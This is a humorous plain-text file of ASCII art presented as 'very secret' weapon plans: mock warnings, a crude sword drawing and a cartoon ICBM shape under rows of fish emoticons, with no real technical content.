( > ' ' )> ( > ' ' )> ( > ' ' )> <("<) <("<) <("<) <("<) <("<)
( > ' ' )> ( > ' ' )> ( > ' ' )> <("<) <("<) <("<) <("<) <("<)
( > ' ' )> ( > ' ' )> ( > ' ' )> <("<) <("<) <("<) <("<) <("<)
plans/drawing_of_our_new_weapon_VERY_SECRET.txt
VERY VERY SUPERDUPER SECRET DOCUMENT
====================================
WARNING
DO NOT DISTRIBUTE TO ANYONE!!!
ABSOLUTELY NOT TO THE ENEMY!!!
===================================
IDEA 1:
//
o====||==================> <------ pointy end, toward enemy
\\
IDEA 2:
*
***
******
*******************************************
* ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ **
* **
******* - - - - - - I C B M - - - - - - - - - ********
* **
* ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ **
*******************************************
******
***
*
